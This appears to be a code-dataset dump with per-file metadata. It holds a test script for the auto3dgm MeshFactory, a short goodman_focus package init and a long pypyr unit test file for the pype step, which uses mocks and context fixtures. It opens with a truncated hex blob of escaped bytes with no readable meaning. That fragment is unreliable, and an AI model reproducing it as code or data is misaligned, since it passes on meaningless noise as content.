C7864645C786564775C7862665C7866655C7865375C7866375C786466226B305C7862305C7830625C786335234E5C7831622B4A5C7865315C7862375C7866345C7865345C7866305C7864345C783835435C7831345C7831345C72365C783866225C7866305C783935775C7838355C7861652A5C7831365C7861665C7863315C7838315C7862365C7839385C7864615C783933736D345C7839335C7839395C7838355C7838655C786235715C7830335C7863375C786437235C7839322A235C7831325C783134283F7B765C7866615C7865325C7831385C783031565C783839585C783139585C786535305C7830362E5C7865355C7830655C7838396A3B5C7865393069345C7830385C786434725C7863345C786636785C7863303E5C5C5C786464215C7862375C725C7830625C7866615C7839375C786439622B5C7862315C786
0e48d1fbbd1448264d9a934f33881052ceeebaa5 | 3,209 | py | Python | tests/mesh/meshfactory_realdatatest.py | ToothAndClaw/auto3dgm_nazar | c8202c964ebb8f8e2410bbd739bfb01d1ba4dcf4 | [
"MIT"
] | null | null | null | tests/mesh/meshfactory_realdatatest.py | ToothAndClaw/auto3dgm_nazar | c8202c964ebb8f8e2410bbd739bfb01d1ba4dcf4 | [
"MIT"
] | 9 | 2018-12-14T18:46:54.000Z | 2019-03-29T17:40:23.000Z | tests/mesh/meshfactory_realdatatest.py | ToothAndClaw/auto3dgm_nazar | c8202c964ebb8f8e2410bbd739bfb01d1ba4dcf4 | [
"MIT"
] | 4 | 2018-12-07T21:03:30.000Z | 2019-01-26T22:07:11.000Z | #Test script for the mesh factory
from auto3dgm_nazar.mesh.meshfactory import MeshFactory
#Test case 0: Giving a nonexistent file
#Conditions: filestring refers to a file that does not exist
#Expect: When I try to create a mesh, I get an error
filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/Non-existing file.ply'
MeshFactory.mesh_from_file(filestring)
'''
In [27]: filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/Non-existing file.ply'
In [28]: MeshFactory.mesh_from_file(filestring)
---------------------------------------------------------------------------
OSError Traceback (most recent call last)
<ipython-input-28-dce76620cc80> in <module>()
----> 1 MeshFactory.mesh_from_file(filestring)
/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/gitstuff/auto3dgm/auto3dgm/mesh/meshfactory.py in mesh_from_file(file_path)
52 msg = 'File {} not present or not allowed filetype: {}'.format(
53 file_path, ', '.join(allowed_filetypes))
---> 54 raise OSError(msg)
55
56 @staticmethod
OSError: File /home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/Non-existing file.ply not present or not allowed filetype: .ply, .obj, .stl
'''
# Result: Success!
#Test case 1: Giving an unsupported file type
#Conditions: filestring refers to a file type that is not supported
#Expect: When I try to create a mesh, I get an error
filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/.off'
MeshFactory.mesh_from_file(filestring)
'''
In [29]: filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/.off'
In [30]: MeshFactory.mesh_from_file(filestring)
---------------------------------------------------------------------------
OSError Traceback (most recent call last)
<ipython-input-30-dce76620cc80> in <module>()
----> 1 MeshFactory.mesh_from_file(filestring)
/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/gitstuff/auto3dgm/auto3dgm/mesh/meshfactory.py in mesh_from_file(file_path)
52 msg = 'File {} not present or not allowed filetype: {}'.format(
53 file_path, ', '.join(allowed_filetypes))
---> 54 raise OSError(msg)
55
56 @staticmethod
OSError: File /home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/.off not present or not allowed filetype: .ply, .obj, .stl
'''
# Result: Success!
#Test case 2: Giving a valid .ply file
#Conditions: filestring refers to an existing supported file
#Expect: When I try to create a mesh, a mesh is successfully created
filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/12144_U02_Eosimias_crop-smooth.ply'
MeshFactory.mesh_from_file(filestring)
'''
In [12]: filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/12144_U02_Eosimias_crop-smooth.ply'
In [13]: MeshFactory.mesh_from_file(filestring)
<class 'vtkCommonDataModelPython.vtkPolyData'>
Out[13]: <auto3dgm.mesh.mesh.Mesh at 0x7f85c374fa58>
'''
# Result: Pass
| 42.786667 | 166 | 0.705516 | 419 | 3,209 | 5.267303 | 0.245823 | 0.04531 | 0.077028 | 0.113276 | 0.851835 | 0.794291 | 0.778432 | 0.746715 | 0.746715 | 0.730856 | 0 | 0.037118 | 0.143658 | 3,209 | 74 | 167 | 43.364865 | 0.766012 | 0.164537 | 0 | 0.428571 | 0 | 0.285714 | 0.548204 | 0.531191 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0e51658cf3fd699affeaa6432d3c3d1ea2aa40d4 | 117 | py | Python | goodman_focus/__init__.py | soar-telescope/goodman_focus | 5a99ddc57af2276a28e6e165089e4be5b03b911c | [
"BSD-3-Clause"
] | null | null | null | goodman_focus/__init__.py | soar-telescope/goodman_focus | 5a99ddc57af2276a28e6e165089e4be5b03b911c | [
"BSD-3-Clause"
] | 16 | 2019-06-26T21:24:30.000Z | 2021-09-21T16:00:11.000Z | goodman_focus/__init__.py | soar-telescope/goodman_focus | 5a99ddc57af2276a28e6e165089e4be5b03b911c | [
"BSD-3-Clause"
] | 1 | 2021-09-20T03:30:31.000Z | 2021-09-20T03:30:31.000Z | from .version import __version__
from .goodman_focus import GoodmanFocus
from .goodman_focus import run_goodman_focus | 39 | 44 | 0.880342 | 16 | 117 | 5.9375 | 0.4375 | 0.378947 | 0.336842 | 0.463158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094017 | 117 | 3 | 44 | 39 | 0.896226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0e93ff2c5bf38fa535abe656df3530e9ff558dbd | 39,300 | py | Python | tests/unit/pypyr/steps/pype_test.py | pypyr/pypyr-cli | dc0f694ac0c0e3c2844c1a20788c9af586a8a16e | [
"Apache-2.0"
] | 31 | 2017-03-24T11:27:34.000Z | 2020-05-27T20:06:28.000Z | tests/unit/pypyr/steps/pype_test.py | pypyr/pypyr-cli | dc0f694ac0c0e3c2844c1a20788c9af586a8a16e | [
"Apache-2.0"
] | 89 | 2017-04-12T09:50:32.000Z | 2020-08-13T13:18:36.000Z | tests/unit/pypyr/steps/pype_test.py | pypyr/pypyr-cli | dc0f694ac0c0e3c2844c1a20788c9af586a8a16e | [
"Apache-2.0"
] | 6 | 2017-06-04T14:19:59.000Z | 2020-02-10T13:16:40.000Z | """pype.py unit tests."""
import logging
from unittest.mock import call, Mock
import pytest
from pypyr.context import Context
from pypyr.errors import (
ContextError,
Stop,
KeyInContextHasNoValueError,
KeyNotInContextError)
from pypyr.pipeline import Pipeline
from pypyr.pipedef import PipelineDefinition, PipelineInfo
import pypyr.steps.pype as pype
from tests.common.utils import patch_logger
# region fixtures
def new_pipe_and_args_wrapper(mock_pipe):
"""Return ref to Pipeline new_pipe_and_args, overriding the cls arg.
Reason is normal patch does not patch out the cls arg on a class method.
Intercept the factory method, passing in a mock as type to instantiate.
Args:
mock_pipe: Replace the 1st arg (i.e cls) to the classmethod with me.
"""
# get the reference to the underlying method before it's patched
og_ref = Pipeline.new_pipe_and_args.__func__
def new_pipe_and_args(*args, **kwargs):
# the first arg is cls - for which we're substituting the mock
return og_ref(mock_pipe, *args, **kwargs)
return new_pipe_and_args
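The trick the wrapper above relies on can be shown in isolation. A minimal sketch with a hypothetical `Widget` class (not part of pypyr): accessing `__func__` on a classmethod yields the underlying plain function, so a mock can be passed explicitly where `cls` would normally be bound.

```python
from unittest.mock import Mock


class Widget:
    """Hypothetical class; stands in for Pipeline."""

    @classmethod
    def create(cls, name):
        # cls() would normally instantiate the real class.
        return cls(), name


# Grab the underlying plain function before any patching, then call it
# with a mock substituted for cls - the same move as
# new_pipe_and_args_wrapper above.
og_ref = Widget.create.__func__
mock_cls = Mock(return_value='mocked instance')
instance, name = og_ref(mock_cls, 'arb')
```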
@pytest.fixture
def mock_pipe(monkeypatch):
"""Intercept Pipeline.new_pipe_and_args factory method."""
mock_pipe = Mock(spec=Pipeline)
mock_pipe._get_parse_input = Pipeline._get_parse_input
monkeypatch.setattr('pypyr.steps.pype.Pipeline.new_pipe_and_args',
new_pipe_and_args_wrapper(mock_pipe))
return mock_pipe
# endregion fixtures
def get_arb_pipeline_scope(context):
"""Context must be in pipeline scope to get current pipe info."""
pipeline = Pipeline('arb pipe')
pipeline.pipeline_definition = PipelineDefinition(
pipeline=None,
info=PipelineInfo(pipeline_name='arb',
loader=None,
parent=None))
return context.pipeline_scope(pipeline)
# region get_arguments
def test_pype_get_arguments_all():
"""Parse all input from context."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'out': 'out value',
'pipeArg': 'argument here',
'useParentContext': False,
'skipParse': 'skip parse',
'raiseError': 'raise err',
'loader': 'test loader',
'groups': ['gr'],
'success': 'sg',
'failure': 'fg',
'pyDir': 'arb/dir',
'parent': 'the parent'
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'b'}
assert out == 'out value'
assert not use_parent_context
assert skip_parse == 'skip parse'
assert pipe_arg == ['argument', 'here']
assert raise_error == 'raise err'
assert loader == 'test loader'
assert groups == ['gr']
assert success_group == 'sg'
assert failure_group == 'fg'
assert py_dir == 'arb/dir'
assert parent == 'the parent'
def test_pype_get_arguments_all_with_interpolation():
"""Parse all input from context."""
context = Context({
'pipeName': 'pipe name',
'argsHere': {'a': '{pipeName}'},
'outHere': 'out here',
'argHere': 'argument here',
'parentContext': False,
'skipParse': 'skip parse',
'raiseErr': 'raise err',
'loaderHere': 'test loader',
'groups': ['gr'],
'success': 'sg',
'failure': 'fg',
'dir': 'arb/dir',
'parent': 'the parent',
'pype': {
'name': '{pipeName}',
'args': '{argsHere}',
'out': '{outHere}',
'pipeArg': '{argHere}',
'useParentContext': '{parentContext}',
'skipParse': '{skipParse}',
'raiseError': '{raiseErr}',
'loader': '{loaderHere}',
'groups': '{groups}',
'success': '{success}',
'failure': '{failure}',
'pyDir': '{dir}',
'parent': '{parent}'
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'pipe name'}
assert out == 'out here'
assert not use_parent_context
assert pipe_arg == ['argument', 'here']
assert skip_parse == 'skip parse'
assert raise_error == 'raise err'
assert loader == 'test loader'
assert groups == ['gr']
assert success_group == 'sg'
assert failure_group == 'fg'
assert py_dir == 'arb/dir'
assert parent == 'the parent'
def test_pype_get_arguments_defaults():
"""Parse all input from context and assign defaults where not specified."""
context = Context({
'pype': {
'name': 'pipe name'
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert use_parent_context
assert isinstance(use_parent_context, bool)
assert pipe_arg is None
assert skip_parse
assert isinstance(skip_parse, bool)
assert raise_error
assert isinstance(raise_error, bool)
assert loader is None
assert groups is None
assert success_group is None
assert failure_group is None
assert py_dir is None
# defaults to current pipeline's parent if cascading loader.
assert parent is None
def test_pype_get_arguments_missing_pype():
"""Missing pype throw."""
context = Context()
with pytest.raises(KeyNotInContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == ("context['pype'] "
"doesn't exist. It must exist for "
"pypyr.steps.pype.")
def test_pype_get_args_not_a_dict():
"""When args not a dict raise."""
context = Context({'pype': {'name': 'blah', 'args': 'arb'}})
with pytest.raises(ContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == (
"pypyr.steps.pype 'args' in the 'pype' context item "
"must be a dict.")
def test_pype_get_out_set_with_use_parent_context():
"""When out is present useParentContext must be false."""
context = Context({'pype': {'name': 'blah',
'out': 'arb',
'useParentContext': True}})
with pytest.raises(ContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == (
"pypyr.steps.pype pype.out is only "
"relevant if useParentContext = False. If you're using the parent "
"context, no need to have out args since their values will already be "
"in context. If you're NOT using parent context and you've specified "
"pype.args, just leave off the useParentContext key and it'll default "
"to False under the hood, or set it to False yourself if you keep it "
"in.")
def test_pype_get_arguments_missing_name():
"""Missing pype name throw."""
context = Context({'pype': {}})
with pytest.raises(KeyNotInContextError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == (
"pypyr.steps.pype missing 'name' in the 'pype' "
"context item. You need to specify the pipeline name to run another "
"pipeline.")
def test_pype_get_arguments_name_empty():
"""Empty pype name throw."""
context = Context({'pype': {'name': None}})
with pytest.raises(KeyInContextHasNoValueError) as err_info:
pype.get_arguments(context)
assert str(err_info.value) == ("pypyr.steps.pype ['pype']['name'] exists "
"but is empty.")
def test_pype_get_arguments_group_str():
"""Parse group as str input from context."""
context = Context({
'pype': {
'name': 'pipe name',
'groups': 'gr',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert use_parent_context
assert isinstance(use_parent_context, bool)
assert pipe_arg is None
assert skip_parse
assert isinstance(skip_parse, bool)
assert raise_error
assert isinstance(raise_error, bool)
assert loader is None
assert groups == ['gr']
assert success_group is None
assert failure_group is None
assert py_dir is None
assert parent is None
def test_pype_get_arguments_group_str_interpolate():
"""Parse group as interpolated str input from context."""
context = Context({
'group': 'gr',
'pype': {
'name': 'pipe name',
'groups': '{group}',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert use_parent_context
assert isinstance(use_parent_context, bool)
assert pipe_arg is None
assert skip_parse
assert isinstance(skip_parse, bool)
assert raise_error
assert isinstance(raise_error, bool)
assert loader is None
assert groups == ['gr']
assert success_group is None
assert failure_group is None
assert py_dir is None
assert parent is None
def test_pype_get_args_no_parent_context():
"""If args set use_parent_context should default False."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'b'}
assert out is None
assert not use_parent_context
assert pipe_arg is None
assert skip_parse
assert raise_error
assert not loader
assert not groups
assert not success_group
assert not failure_group
assert py_dir is None
assert parent is None
def test_pype_get_pipeargs_no_skip_parse():
"""If pipeArgs set skipParse should default False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'a b c',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args is None
assert out is None
assert not use_parent_context
assert pipe_arg == ['a', 'b', 'c']
assert not skip_parse
assert raise_error
assert not loader
assert not groups
assert not success_group
assert not failure_group
assert py_dir is None
assert parent is None
def test_pype_get_args_and_pipearg():
"""Combine pipeArgs and args. Defaults useParentContext to False."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'pipeArg': 'a b c',
}
})
with get_arb_pipeline_scope(context):
(pipeline_name,
args,
out,
use_parent_context,
pipe_arg,
skip_parse,
raise_error,
loader,
groups,
success_group,
failure_group,
py_dir,
parent) = pype.get_arguments(context)
assert pipeline_name == 'pipe name'
assert args == {'a': 'b'}
assert out is None
assert not use_parent_context
assert pipe_arg == ['a', 'b', 'c']
assert not skip_parse
assert raise_error
assert not loader
assert not groups
assert not success_group
assert not failure_group
assert py_dir is None
assert parent is None
# region cascading
def get_scope_from_info(context, info):
"""Context must be in pipeline scope to get current pipe info."""
pipeline = Pipeline('arb pipe')
pipeline.pipeline_definition = PipelineDefinition(pipeline=None, info=info)
return context.pipeline_scope(pipeline)
def test_pype_gets_args_loader_non_cascading():
"""Loader not cascading."""
context = Context({
'pype': {
'name': 'pipe name'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='noncascading/dir',
is_loader_cascading=False)
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader is None
assert pype_args.parent is None
def test_pype_get_args_parent_cascading():
"""Same loader as parent with cascade."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='cascading/parent')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent == 'cascading/parent'
def test_pype_get_args_parent_not_cascading_parent():
"""A non-cascading loader does not cascade parent."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='noncascading/dir',
is_parent_cascading=False)
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent is None
def test_pype_get_args_parent_cascading_different_loader_set():
"""Do not cascade when different loader than parent."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader1'
}
})
info = PipelineInfo(
pipeline_name='arb',
loader='arbloader2',
parent='cascading/dir')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader1'
assert pype_args.parent is None
def test_pype_get_args_parent_cascade_no_loader_set():
"""No loader set on parent and no loader on pype with cascade.
This is very edge. pypyr core will normalize loader=None to the file
loader, and to use a custom loader the dev would have to pass a non-None
to run()/load_and_run() to begin with.
It shouldn't ever happen short of some heavy customization where a custom
client loader explicitly sets None the loader property on the Info object.
Which, why? But just in case, here's a test.
"""
context = Context({
'pype': {
'name': 'pipe name'
}
})
info = PipelineInfo(
pipeline_name='arb',
loader=None,
parent='cascading/parent')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader is None
assert pype_args.parent == 'cascading/parent'
def test_pype_get_args_parent_cascade_no_loader_no_parent_set():
"""No loader+parent set on parent & no loader+parent on pype with cascade.
This is very edge. pypyr core will normalize loader=None to the file
loader, and to use a custom loader the dev would have to pass a non-None
to run()/load_and_run() to begin with.
It shouldn't ever happen short of some heavy customization where a custom
client loader explicitly sets None the loader property on the Info object.
Which, why? But just in case, here's a test.
"""
context = Context({
'pype': {
'name': 'pipe name'
}
})
info = PipelineInfo(
pipeline_name='arb',
loader=None,
parent=None)
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader is None
assert pype_args.parent is None
def test_pype_get_parent_set_on_cascading_loader():
"""Always use parent when set even if cascading loader."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader',
'parent': 'arb/from/child'
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='ignore me')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent == 'arb/from/child'
def test_pype_resolve_from_parent_false_on_cascading_loader():
"""Ignore loader is_parent_cascading when resolveFromParent False."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader',
'resolveFromParent': False
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='ignore me')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent is None
def test_pype_resolve_from_parent_true_on_cascading_loader():
"""Ignore loader is_parent_cascading when resolveFromParent False."""
context = Context({
'pype': {
'name': 'pipe name',
'loader': 'arbloader',
'resolveFromParent': True
}
})
info = PipelineInfo(pipeline_name='arb',
loader='arbloader',
parent='from parent')
with get_scope_from_info(context, info):
pype_args = pype.get_arguments(context)
assert pype_args.pipeline_name == 'pipe name'
assert pype_args.loader == 'arbloader'
assert pype_args.parent == 'from parent'
# endregion cascading
# endregion get_arguments
# region run_step
def mocked_run_pipeline(*args, **kwargs):
"""Check pipeline name set on context in child pipeline."""
# assert (kwargs['name']
# == kwargs['context'].pipeline_name == 'pipe name')
# assert (kwargs['pipeline_name'] == 'pipe name')
pass
def test_pype_use_parent_context(mock_pipe):
"""Input pype use_parent_context True."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader'
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with(context, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, using parent context.'),
call('pyped pipe name.')]
def test_pype_use_parent_context_with_args(mock_pipe):
"""Input pype use_parent_context True with args."""
context = Context({
'k1': 'v1',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader'
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
# args merges into context
merged_context = {
'a': 'b',
'k1': 'v1',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'pipeArg': 'argument here',
'useParentContext': True,
'skipParse': True,
'raiseError': True,
'loader': 'test loader'
}
}
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with(merged_context, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, using parent context.'),
call('pyped pipe name.')]
def test_pype_no_parent_context(mock_pipe):
"""Input pype use_parent_context False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': False,
'skipParse': True,
'raiseError': True,
'loader': 'test loader',
}
})
# context.parent = 'arb/dir'
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=False,
loader='test loader',
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
# using empty/fresh new context
mocked_runner.assert_called_once_with({}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
def test_pype_args(mock_pipe):
"""Input pype args used as context."""
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'}
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
# using args as context
mocked_runner.assert_called_once_with({'a': 'b'}, None)
def test_pype_args_with_shortcut(mock_pipe, monkeypatch):
"""Input pype args merged into shortcut used as context."""
shortcuts = {'pipe name': {
'pipeline_name': 'sc pipe',
'args': {
'a': 'og',
'c': ['d']
}
}}
monkeypatch.setattr('pypyr.config.config.shortcuts', shortcuts)
context = Context({
'pype': {
'name': 'pipe name',
'args': {'a': 'b'}
}
})
def l_and_r(context, parent):
assert parent is None
assert context == {'a': 'b', 'c': ['d']}
context['c'].append('updated')
context['e'] = 'new'
mock_pipe.return_value.load_and_run_pipeline.side_effect = l_and_r
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='sc pipe',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once()
# original shortcut shouldn't mutate
assert shortcuts == {'pipe name': {
'pipeline_name': 'sc pipe',
'args': {
'a': 'og',
'c': ['d']
}
}}
    # useParentContext is False, therefore no context mutations in parent.
assert context == {
'pype': {
'name': 'pipe name',
'args': {'a': 'b'}
}}
def test_pype_args_with_out(mock_pipe):
"""Input pype args used as context with out."""
context = Context({
'parentkey': 'parentvalue',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'out': 'a'
}
})
context.parent = 'arb/dir'
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
# using args as new context
mocked_runner.assert_called_once_with({'a': 'b'}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
assert context == {'parentkey': 'parentvalue',
'a': 'b',
'pype': {
'name': 'pipe name',
'args': {'a': 'b'},
'out': 'a'
}
}
def test_pype_args_with_mapping_out(mock_pipe):
"""Input pype args used as context with mapping out."""
context = Context({
'parentkey': 'parentvalue',
'pype': {
'name': 'pipe name',
'args': {'a': 'av', 'b': 'bv', 'c': 'cv'},
'out': {'new-a': 'a',
'new-c': 'c'}
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=False,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with({'a': 'av', 'b': 'bv', 'c': 'cv'},
None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
assert context == {'parentkey': 'parentvalue',
'new-a': 'av',
'new-c': 'cv',
'pype': {
'name': 'pipe name',
'args': {'a': 'av', 'b': 'bv', 'c': 'cv'},
'out': {'new-a': 'a',
'new-c': 'c'}
}
}
def test_pype_no_skip_parse(mock_pipe):
"""Input pype use_parent_context False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': 'argument here',
'useParentContext': False,
'skipParse': False,
'raiseError': True
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=['argument', 'here'],
parse_input=True,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with({}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
def test_pype_no_pipe_arg(mock_pipe):
"""Input pype use_parent_context False."""
context = Context({
'pype': {
'name': 'pipe name',
'pipeArg': None,
'useParentContext': False,
'skipParse': False,
'raiseError': True,
}
})
with patch_logger('pypyr.steps.pype', logging.INFO) as mock_logger_info:
with get_arb_pipeline_scope(context):
pype.run_step(context)
mock_pipe.assert_called_once_with(
name='pipe name',
context_args=None,
parse_input=True,
loader=None,
groups=None,
success_group=None,
failure_group=None,
py_dir=None
)
mocked_runner = mock_pipe.return_value.load_and_run_pipeline
mocked_runner.assert_called_once_with({}, None)
assert mock_logger_info.mock_calls == [
call('pyping pipe name, without parent context.'),
call('pyped pipe name.')]
